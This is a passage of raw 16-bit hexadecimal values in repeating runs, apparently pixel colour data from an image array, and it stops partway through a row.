0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 